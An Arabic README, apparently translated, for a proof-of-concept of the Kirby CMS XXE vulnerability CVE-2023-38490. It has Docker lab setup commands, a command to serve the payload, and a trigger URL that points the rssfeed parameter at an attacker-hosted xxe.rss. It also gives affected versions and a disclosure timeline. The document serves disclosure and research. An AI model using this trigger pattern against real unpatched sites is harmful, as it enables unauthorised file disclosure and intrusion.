أداة استغلال ثغرة XML External Entity (XXE) في كيربي - CVE-2023-38490
كيربي < 3.9.6 ثغرة XML External Entity
أداة استغلال لـ CVE-2023-38490 / GHSA-q386-w6fg-gmgp.
عرض الاستغلال
بناء وتشغيل التطبيق التجريبي الضعيف:
cd docker
docker buildx build -t kirby-starterkit-3.9.5 .
docker run -d --rm -p 127.0.0.2:1337:80/tcp --name CVE-2023-38490 kirby-starterkit-3.9.5:latest
تقديم الحمولة التجريبية:
ملاحظة: اختر عنوان ربط يمكن لحاوية docker الوصول إليه.
popd
ruby -run -e httpd ./payload -p 9999 -b 192.168.0.225
تشغيل الاستغلال:
xdg-open http://127.0.0.2:1337/rssfeed?feed=http://192.168.0.225:9999/xxe.rss
كيف ولماذا يعمل؟
الدالة الضعيفة موجودة في نواة كيربي ولكنها لا تُستخدم افتراضيًا في نواة كيربي أو Kirby StarterKit أو Kirby PlainKit. وهذا يعني أن الثغرة لن تؤثر عليك في التكوين الافتراضي ولكن يمكن إدخالها من خلال التطوير المخصص أو عن طريق تثبيت إضافة تستخدم هذه الأداة المتأثرة.
لمزيد من التفاصيل، اقرأ المقال المخصص (EN 🇬🇧 أو FR 🇫🇷).
المراجع
- البرنامج المستهدف: كيربي
- الصفحة الرئيسية / البائع: https://getkirby.com/
- الكود المصدري:
- الإصدارات الضعيفة:
- <= 3.5.8.2
- 3.6.0-3.6.6.2
- 3.7.0-3.7.5.1
- 3.8.0-3.8.4
- 3.9.0-3.9.5
- الإصدارات المُصحَّحة:
- 3.5.8.3+
- 3.6.6.3+
- 3.7.5.2+
- 3.8.4.1+
- 3.9.6+
- التصحيحات:
- التنبيهات:
الجدول الزمني
- الأسبوع 24 - الإثنين، 12 يونيو 2023: تم اكتشاف الثغرة بواسطة Alexandre ZANNI (@noraj)، مهندس اختبار الاختراق في ACCEIS.
- الأسبوع 24 - الثلاثاء، 13 يونيو 2023: تم الإبلاغ عن الثغرة إلى المحرر (كيربي) بواسطة Alexandre ZANNI
- الأسبوع 24 - الأربعاء، 14 يونيو 2023: تم مشاركة إثبات المفهوم مع المحرر (كيربي) من Alexandre ZANNI
- الأسبوع 24 - الأربعاء، 14 يونيو 2023: تمت إضافة RFC 9116 security.txt إلى getkirby.com
- الأسبوع 24 - الخميس، 15 يونيو 2023: تم تأكيد الثغرة من قبل المحرر (كيربي)
- الأسبوع 24 - الخميس، 15 يونيو 2023: تم التخطيط لإصدار الإصلاحات والتصحيحات
- الأسبوع 26 - الخميس، 29 يونيو 2023: تم اكتشاف الثغرة بشكل مستقل بواسطة Patrick FALB (@dapatrese) في FORMER 03.
- الأسبوع 28 - الأحد، 16 يوليو 2023: إنشاء إشعار GitHub خاص
- الأسبوع 29 - الأحد، 23 يوليو 2023: طلب معرف CVE
- الأسبوع 29 - الأحد، 23 يوليو 2023: تم تصحيح الثغرة بواسطة المحرر (كيربي)
- الأسبوع 30 - الإثنين، 24 يوليو 2023: تمت دعوة Alexandre ZANNI إلى الإشعار الخاص من قبل المحرر (كيربي)
- الأسبوع 30 - الإثنين، 24 يوليو 2023: تحضير حاوية docker تجريبية ضعيفة بواسطة Alexandre ZANNI
- الأسبوع 30 - الإثنين، 24 يوليو 2023: تم تسجيل (حجز) معرف CVE CVE-2023-38490
- الأسبوع 30 - الخميس، 27 يوليو 2023: إطلاق عام لإشعار GitHub والتصحيحات
إخلاء مسؤولية
لا تروج ACCEIS أو تشجع أي نشاط غير قانوني، فجميع المحتويات المقدمة في هذا المستودع مخصصة لأغراض البحث والتعليم واكتشاف التهديدات فقط.